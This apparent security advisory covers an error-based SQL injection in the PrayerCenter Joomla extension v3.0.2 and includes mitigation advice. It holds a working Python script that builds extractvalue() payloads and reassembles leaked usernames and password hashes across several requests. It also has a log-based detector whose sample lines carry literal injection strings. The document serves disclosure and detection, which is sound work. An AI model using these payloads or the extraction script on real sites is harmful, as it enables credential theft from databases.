05/04/18: Joomla (CMS) PrayerCenter confirm() SQLi

Threat Summary

Overview

The PrayerCenter Joomla extension v3.0.2 contains a SQL injection vulnerability: unsanitized user input is concatenated directly into a SQL query string. The attack abuses the MySQL 'extractvalue' function to force an XPath syntax error whose message contains attacker-chosen text. Because the database error text is reproduced on the Joomla error page returned to the user, the output of an injected subquery is leaked in the response. This error-based technique can be used to exfiltrate sensitive information from the database, such as usernames and password hashes.

Exploitation

Stages

An unauthenticated remote user submits a GET request to the extension's confirm task containing a numeric 'id' parameter and SQL injection syntax in the 'sessionid' parameter.

The server concatenates the injected syntax into a SQL query and executes it. The injected extractvalue() call makes the database evaluate attacker-controlled text as an XPath expression, and the resulting XPath syntax error, which quotes that text together with the output of the injected subquery, is returned on the error page.
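The two stages above, worked through as an added example that is not code from the advisory or from the PrayerCenter extension. It shows the shape of the injected 'sessionid' value, why extractvalue() leaks the subquery result through the error message, and how an attacker reassembles a value longer than one error message. Assumptions not confirmed by the advisory: the injection point sits inside a single-quoted string, the component is reached as option=com_prayercenter with task=confirm, the table prefix is jos_, and the error pages are constructed rather than captured.

```python
"""Anatomy of the extractvalue() error-based exfiltration described above.

Added example, not code from the advisory or from the PrayerCenter extension.
Assumptions (not confirmed by the advisory): the injection point sits inside a
single-quoted string, the component is reached as option=com_prayercenter with
task=confirm, and the error pages below are constructed, not captured.
"""
import re
from urllib.parse import urlencode

MARKER = "~"   # 0x7e: guarantees an invalid XPath expression and marks the leak
SLICE = 31     # MySQL prints 32 chars of the bad XPath; one of them is the marker


def exfil_payload(subquery: str, offset: int) -> str:
    """Value for the 'sessionid' parameter: close the quoted string, then make
    extractvalue() parse one SLICE-sized window of the subquery result as XPath."""
    window = f"SUBSTRING(({subquery}),{offset},{SLICE})"
    return f"' AND extractvalue(1,CONCAT(0x7e,{window}))-- -"


def build_url(subquery: str, offset: int,
              base: str = "http://joomla.example/index.php") -> str:
    """GET request as in stage 1: numeric id, injection in sessionid (URL layout assumed)."""
    params = {
        "option": "com_prayercenter",   # assumed component name
        "task": "confirm",
        "id": 1,
        "sessionid": exfil_payload(subquery, offset),
    }
    return f"{base}?{urlencode(params)}"


# MySQL reports the offending XPath verbatim: XPATH syntax error: '~<leaked data>'
XPATH_ERR = re.compile(r"XPATH syntax error: '" + re.escape(MARKER) + r"([^']*)'")


def leaked_slice(error_page: str):
    """Return the leaked window from an error page, or None if no leak is present."""
    m = XPATH_ERR.search(error_page)
    return m.group(1) if m else None


def reassemble(error_pages) -> str:
    """Join consecutive windows (offsets 1, 32, 63, ...) into the full value.
    A window shorter than SLICE means the end of the value was reached."""
    parts = []
    for page in error_pages:
        window = leaked_slice(page)
        if window is None:
            break
        parts.append(window)
        if len(window) < SLICE:
            break
    return "".join(parts)


# Constructed sample: the error pages a sequence of requests would return when the
# injected subquery selects username:password from the users table.
SAMPLE_SUBQUERY = "SELECT CONCAT(username,0x3a,password) FROM jos_users LIMIT 1"  # jos_ prefix assumed
SAMPLE_SECRET = "admin:$2y$10$" + "A" * 53   # made-up value, bcrypt hash length (60)
SAMPLE_PAGES = [
    f"<h1>Error</h1><p>XPATH syntax error: '{MARKER}{SAMPLE_SECRET[i:i + SLICE]}'</p>"
    for i in range(0, len(SAMPLE_SECRET), SLICE)
]
# One request per window: SUBSTRING offsets 1, 32, 63
SAMPLE_URLS = [build_url(SAMPLE_SUBQUERY, 1 + i)
               for i in range(0, len(SAMPLE_SECRET), SLICE)]

if __name__ == "__main__":
    print(SAMPLE_URLS[0])
    print(reassemble(SAMPLE_PAGES))
```

The 32-character limit on the XPath error text is why a single request cannot leak a whole password hash; the SUBSTRING() window is what turns one error message into a paging mechanism, and it is also why a site's error page showing raw database errors matters more than the injection itself.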

Prerequisites

To extract user credentials, the attacker needs to know the database table prefix in use, or can discover it with the same injection, either by brute force or by reading table names from information_schema. Because v3.0.2 is the most recent release of the extension, no fixed version exists, and any Joomla site running the extension should be assumed vulnerable.

Alert Logic Coverage

Alert Logic® has evaluated its customer base for exposure to this exploit and has developed signatures to detect the threat, depending on the security service in place.

The Network-Based Intrusion Detection System (IDS) in Alert Logic Threat Manager™ has been updated with new signatures for this exploit. If a signature matches, an incident is generated in the Alert Logic console.
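Detection logic of the kind a network or log-based signature encodes, as an added example; this is not Alert Logic's signature and not code from the advisory. It scans web-server access log lines for requests to the extension's confirm task whose 'sessionid' parameter carries a MySQL error-based injection function (extractvalue or updatexml), after URL decoding, double-decoding and case folding. The log lines are constructed for the example, and the option=com_prayercenter URL layout is an assumption.

```python
"""Detection of the PrayerCenter error-based SQLi in access logs.

Added example, not Alert Logic's signature and not code from the advisory.
The log lines are constructed; the option=com_prayercenter layout is assumed.
"""
import re
from urllib.parse import urlsplit, parse_qs, unquote_plus

# Constructed Apache-style access log lines (not real traffic). Line 2 is the
# plain payload, line 3 is double-encoded with mixed case, line 4 is a benign
# request to another component that merely mentions the function name.
SAMPLE_LOG = """\
203.0.113.7 - - [04/May/2018:10:02:11 +0000] "GET /index.php?option=com_prayercenter&task=confirm&id=1&sessionid=abc123 HTTP/1.1" 200 5120
203.0.113.9 - - [04/May/2018:10:02:15 +0000] "GET /index.php?option=com_prayercenter&task=confirm&id=1&sessionid=1'%20AND%20extractvalue(1,concat(0x7e,(select%20version())))--%20- HTTP/1.1" 500 2210
203.0.113.9 - - [04/May/2018:10:02:16 +0000] "GET /index.php?option=com_prayercenter&task=confirm&id=1&sessionid=1%2527+AND+UpDaTeXmL(1,CONCAT(0x7e,(SELECT+user())),1)--+- HTTP/1.1" 500 2198
198.51.100.4 - - [04/May/2018:10:03:02 +0000] "GET /index.php?option=com_content&view=article&id=7&q=extractvalue HTTP/1.1" 200 8800
"""

REQ_LINE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)
# Error-based injection functions followed by an opening parenthesis.
ERR_FUNC = re.compile(r"\b(extractvalue|updatexml)\s*\(")


def normalize(value: str) -> str:
    """Decode one extra layer (catches %2527-style double encoding), drop inline
    comments used for obfuscation, and fold case so spacing/case variants match."""
    v = unquote_plus(value)
    v = re.sub(r"/\*.*?\*/", "", v)
    return v.lower()


def inspect(line: str):
    """Return a finding dict for one log line, or None if nothing suspicious."""
    m = REQ_LINE.match(line)
    if not m:
        return None
    target = urlsplit(m.group("target"))
    if not target.path.endswith("index.php"):
        return None
    qs = parse_qs(target.query, keep_blank_values=True)   # decodes one layer
    if qs.get("option") != ["com_prayercenter"] or qs.get("task") != ["confirm"]:
        return None
    for raw in qs.get("sessionid", []):
        hit = ERR_FUNC.search(normalize(raw))
        if hit:
            return {
                "ip": m.group("ip"),
                "ts": m.group("ts"),
                "param": "sessionid",
                "func": hit.group(1),
                "status": int(m.group("status")),
            }
    return None


def scan(log_text: str):
    """Findings for every line of an access log, in log order."""
    return [f for f in (inspect(ln) for ln in log_text.splitlines()) if f]


if __name__ == "__main__":
    for finding in scan(SAMPLE_LOG):
        print(finding)
```

Scoping the match to the vulnerable parameter of the vulnerable task keeps the false-positive rate low; a generic "extractvalue anywhere in the URL" rule would fire on the benign line 4. The HTTP 500 status on the hits is a useful corroborating signal, since a successful error-based injection produces an error page by design.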

Recommendations for Mitigation

Upgrade to a non-vulnerable version of the extension if one becomes available. Because the latest release (v3.0.2) is itself vulnerable, disable or uninstall the extension, or replace it with an alternative, until a patch is released.